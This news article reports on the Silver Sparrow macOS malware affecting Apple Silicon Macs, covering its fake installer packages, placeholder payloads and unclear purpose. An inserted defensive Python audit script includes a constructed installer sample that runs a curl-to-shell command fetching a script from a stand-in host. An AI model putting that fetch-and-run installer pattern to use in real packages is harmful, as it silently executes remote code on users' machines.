Mysterious malware infecting Apple Silicon Macs has no payload yet

More malware affecting Apple Silicon Macs has been discovered, but researchers have noted that there is currently no malicious payload.

There seems to be more malware targeting Apple’s M1-based Macs than previously thought. Following the initial reports of the first M1 malware found in the wild, more infections have surfaced, but of a particularly toothless variety.

In early February, Red Canary researchers discovered a type of macOS malware that used a LaunchAgent to establish persistence, just like other forms of malware. What interested the researchers was that the malware behaved differently from typical adware, in that it used JavaScript for execution.

The malware strain, referred to by the researchers as ‘Silver Sparrow’, also contained a binary compiled to run on M1 chips. This made it malware that could potentially target Apple Silicon Macs.

Further research by VMware Carbon Black and Malwarebytes determined that Silver Sparrow was probably a “previously unmarked type of malware”. As of February 17, it had been detected on 29,139 macOS endpoints in 153 countries, with the majority of infections in the US, UK, Canada, France and Germany.

At the time of publication, the malware had not been used to deliver a malicious payload to the victim Macs, but that may change in the future. Given its M1 compatibility, its “relatively high infection rate” and its operational maturity, the researchers considered it a serious enough threat to warrant public disclosure, as it is ‘uniquely positioned to deliver a potentially effective payload in an instant’.

Two versions of the malware have been discovered: one version’s payload is a binary that affects only Intel-based Macs, while the other is a binary compiled for both Intel and M1 architectures. The payload is apparently a placeholder, since the first version opens a window that literally says “Hello, World!” and the second says “You have done it!”

An example of the included binary [via Red Canary]

Had the binary been genuinely malicious, a single executable could have carried the same or similar payload instructions for both architectures.

The infection mechanism centres on files named “update.pkg” and “updater.pkg”, which pose as installers. They use the macOS Installer JavaScript API to execute the suspicious commands.

This behavior is sometimes seen in legitimate software but rarely in malware, which usually relies on preinstall or postinstall scripts to execute commands.
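As an added illustration, not code from the article or from Red Canary, the following Python audit parses a package’s Distribution XML and flags installer JavaScript that calls `system.run`, the installer-API pattern described above, as opposed to the usual preinstall/postinstall scripts. The sample Distribution file, its function name and its URL are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample Distribution file (not the real malware's file):
# the installer's own JavaScript API runs a shell command during the
# pre-install check, and allow-external-scripts enables system.run.
SAMPLE_DISTRIBUTION = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
  <title>Updater</title>
  <options customize="never" allow-external-scripts="yes"/>
  <installation-check script="installCheck()"/>
  <script><![CDATA[
  function installCheck() {
    system.run('/bin/sh', '-c', 'curl -s https://example.invalid/u.sh | sh');
    return true;
  }
  ]]></script>
</installer-gui-script>
"""

SYSTEM_RUN = re.compile(r"system\.run\s*\(([^)]*)\)")
NETWORK = re.compile(r"https?://\S+|\bcurl\b|\bnscurl\b")


def audit_distribution(xml_text):
    """Return findings for one Distribution XML document (str or bytes)."""
    data = xml_text.encode() if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    opts = root.find("options")
    # system.run only works when the package opts in to external scripts.
    allow_external = opts is not None and opts.get("allow-external-scripts") == "yes"
    # Hooks that run a JavaScript function before any file is installed.
    hooks = [c.tag for c in root
             if c.tag in ("installation-check", "volume-check") and c.get("script")]
    script = "\n".join(s.text or "" for s in root.findall("script"))
    runs = [m.group(1).strip() for m in SYSTEM_RUN.finditer(script)]
    return {
        "allow_external_scripts": allow_external,
        "hooks": hooks,
        "system_run_calls": runs,
        "network_indicators": bool(NETWORK.search(script)),
        # Command execution wired into a pre-install hook is the pattern to review.
        "suspicious": allow_external and bool(runs) and bool(hooks),
    }
```

To audit a real package, expand it with `pkgutil --expand package.pkg outdir` and pass the contents of `outdir/Distribution` to `audit_distribution`.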

Once installed, the infection checks a specific URL for a downloadable file, which may contain further instructions or a final payload. A week of monitoring the malware produced no visible final payload, though that may change in the future.

Several questions about Silver Sparrow remain unanswered for the researchers, including how the initial PKG files were used to infect systems, and the purpose of elements of the malware’s code that appear to be part of a wider toolkit.

“The ultimate purpose of this malware is a mystery,” admits Red Canary. “We have no way of knowing with certainty what payload will be distributed by the malware, if a payload has already been delivered and removed, or if the adversary has a future timeline for distribution.”

There is also the question of why the ‘Hello World’ executables were included at all, since the binary will not run unless a victim actually seeks it out and launches it, rather than running automatically. The executables suggest that the malware may still be under development, or that an application bundle was needed to make the malware appear legitimate to other parties.
